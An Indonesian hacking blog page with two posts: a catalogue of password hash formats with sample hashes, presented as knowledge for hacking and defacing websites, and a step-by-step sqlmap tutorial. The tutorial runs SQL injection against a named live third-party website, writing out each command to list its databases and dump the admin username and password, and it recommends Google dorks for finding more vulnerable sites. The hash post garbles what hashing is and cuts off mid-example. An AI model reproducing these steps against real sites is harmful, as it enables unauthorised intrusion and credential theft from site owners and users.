Sunday, April 6, 2014

Jenis Hash Password

1 comments





Keterangan: Hash Adalah pensensor password biasanya untuk website atau sebagainya! untuk merubah password di barcode melalui symlink terutama untuk deface & hacking Website :)
Dan ini adalah jenis - jenis Hash yang harus anda ketahui bagi para hacking dan defacing xD


1. DES(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 13 Karakter.

[+] Deskripsi : Dua karakter pertama adalah salt (Karakter acak, di contoh kita saltnya adalah string "Iv.") kemudian diikuti oleh Hashnya.

[+] Contoh : IvS7aeT4NzQPM

2. Domain Cached Credentials

[+] Digunakan untuk mencache password-password domain windows.

[+] Panjang : 16 bytes (32 Karakter)

[+] Algorithm : MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

[+] Contoh : Admin:b474d48cdfc4974d86ef4d24904cdd91

3. MD5(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 34 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $1$ kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678") kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.

[+] Contoh : $1$12345678$XM4P3PrKBgKNnTaqG9P0T/

4. MD5(APR)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 37 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $apr1$ , kemudian dilanjutkan dengan salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $ , kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2000 kali.

[+] Contoh : $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.

5. MD5(phpBB3)

[+] Digunakan di phpBB 3.x.x.

[+] Panjang : 37 Karakter.

[+] Dekripsi : Hash dimulai dengan tanda $H$ kemudian diikuti dengan satu karakter (paling sering angka "9") kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 2048 kali.

[+] Contoh : $H$9123456785DAERgALpsri.D9z3ht120

6. MD5(Wordpress)

[+] Digunakan di Wordpress.

[+] Panjang : 34 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $P$ , kemudian diikuti dengan satu karakter (Paling sering huruf "B"), kemudian diikuti dengan salt (8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian diikuti oleh Hashnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma md5 sebanyak 8192 kali.

[+] Contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MySQL

[+] Digunakan di MySQL versi lama.

[+] Panjang : 8 bytes.

[+] Deskripsi : Hash yang terdiri dari dua DWORD, masing-masing tidak melebihi nilai 0x7fffffff.

[+] Contoh : 606717496665bcba

8. MySQL5

[+] Digunakan di MySQL Versi baru.

[+] Panjang : 20 bytes.

[+] Algorithm : SHA-1(SHA-1($pass))

[+] Contoh : *E6CC90B878B948C35E92B003C792C46C58C4AF40

[+] Catatan : Hash harus dimuat ke program tanpa tanda bintang (*) yang terdapat di awal setiap hash.

9. RAdmin v2.x

[+] Digunakan di Aplikasi Remote Administrator v2.x.

[+] Panjang : 16 bytes.

[+] Algorithm : Password diisi dengan nol dengan panjang 100 bytes, kemudian seluruh string dihash dengan algoritma MD5.

[+] Contoh : 5e32cceaafed5cc80866737dfb212d7f

10. MD5

[+] Digunakan di phpBB v2.x, Joomla versi di bawah 1.0.13 dan banyak forum dan CMS.

[+] Panjang : 16 bytes.

[+] Algorithm : sama seperti fungsi md5() di php.

[+] Contoh : c4ca4238a0b923820dcc509a6f75849b

11. md5($pass.$salt)

[+] Digunakan di WB News, Joomla Versi 1.0.13 keatas.

[+] Panjang : 16 bytes

[+] contoh : 6f04f0d75f6870858bae14ac0b6d9f73:1234

12. md5($salt.$pass)

[+] Digunakan di osCommerce, AEF, Gallery dan beberapa CMS.

[+] Panjang : 16 bytes.

[+] Contoh : f190ce9ac8445d249747cab7be43f7d5:12

13. md5(md5($pass))

[+] Digunakan di e107, DLE, AVE, Diferior, Koobi dan beberapa CMS.

[+] Panjang : 16 bytes.

[+] Contoh : 28c8edde3d61a0411511d3b1866f0636

14. md5(md5($pass).$salt)

[+] Digunakan di vBulletin, IceBB.

[+] Panjang ; 16 bytes.

[+] Contoh : 6011527690eddca23580955c216b1fd2:wQ6

15. md5(md5($salt).md5($pass))

[+] Digunakan di IPB.

[+] Panjang : 16 bytes.

[+] Contoh : 81f87275dd805aa018df8befe09fe9f8:wH6_S

16. md5(md5($salt).$pass)

[+] Digunakan di MyBB.

[+] Panjang : 16 bytes.

[+] Contoh : 816a14db44578f516cbaef25bd8d8296:1234

17. md5($salt.$pass.$salt)

[+] Digunakan di TBDev.

[+] Panjang : 16 bytes.

[+] Contoh : a3bc9e11fddf4fef4deea11e33668eab:1234

18. md5($salt.md5($salt.$pass))

[+] Digunakan di DLP.

[+] Panjang : 16 bytes.

[+] Contoh : 1d715e52285e5a6b546e442792652c8a:1234

20. SHA-1[+] Digunakan dibanyak Forum dan CMS.

[+] Panjang : 20 bytes

[+] Algorithm: Sama dengan sha1() fungsi di PHP.

[+] Contoh : 356a192b7913b04c54574d18c28d46e6395428ab

21. sha1(strtolower($username).$pass)

[+] Digunakan di SMF

[+] Panjang : 20 bytes.

[+] Contoh : Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a

22. sha1($salt.sha1($salt.sha1($pass)))

[+] Digunakan di Woltlab BB

[+] Panjang : 20 bytes

[+] Contoh : cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234

23. SHA-256(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 55 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $5$, kemudian diikuti salt (sampai dengan 8 karakter acak, di contoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-256 5000 kali.

[+] Contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

24. SHA-512(Unix)

[+] Digunakan di Linux dan sejenisnya.

[+] Panjang : 98 Karakter.

[+] Deskripsi : Hash dimulai dengan tanda $6$, kemudian diikuti dengan salt (sampai dengan 8 karakter acak, dicontoh kita saltnya adalah string "12345678"), kemudian dilanjutkan dengan satu karakter lagi $, kemudian diikuti hash sebenarnya.

[+] Algorithm : Sebenarnya ini adalah loop yang memanggil algoritma SHA-512 5000 kali.

[+] contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm itulah beberapa jenis pasword yang ada dan digunakan.
semoga dapat membantu bagi para pembaca bloger sekalian.
Continue reading →
Tuesday, April 1, 2014

Hacking Website dengan SQLMap di Kali Linux

2 comments

sebelumnya, apa itu sqlmap……???
sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
pertama yang harus kita lakukan, adalah mencari website yang terdapat Vuln sql injection. :)
bisa juga dengan google dork untuk mencari website vulnr.
penulis ada kumpulan dork sql injection silahkan download:
dork sql injection 2014

penulis mengunakan live target "http://www.solutionpack.my/products.php?id=9"
1. buka termnal…


2. inilah perbedaannya danga backtrack, kita tidak harus menuju folder sqlmap terlebih dahulu untuk menjalankanya tetapi langsung kita ketikkan perintah berikut :

root@maverick#sqlmap -u http://www.solutionpack.my/products.php?id=9 --dbs


3. terlihat ada 2 database :
[*] information_schema
[*] solution_newgads

selanjutnya kita cari tabel yang ada di database solution_newgads

dengan perintah

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads --tables


4. akan muncul nama-nama kolom dari database tersebut, lalau kita cari isi kolom yang berisi username dan password admin…dengan perinth berikut
  
root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin --columns
5. untuk melihat isi dari kolom dari username dan pasword tersebut tuliskan perintah:

root@maverick# sqlmap -u http://www.solutionpack.my/products.php?id=9 -D solution_newgads -T admin -C  username,password --dump


binggooo kita dapet username sama passwordnya ..........
terkahir kalau sudah mendapatkan paswd dan user admin tinggal cari halaman login, tapi bisnya passwordnya di enkripsi jdi harus di decrypte terlebih dahulu.
sekian tutorial dari saya.....sebagai pembelajaran.
tetap semangat...... keep learn,keep silent coz silent is deadly attack.
hahahaa.
Continue reading →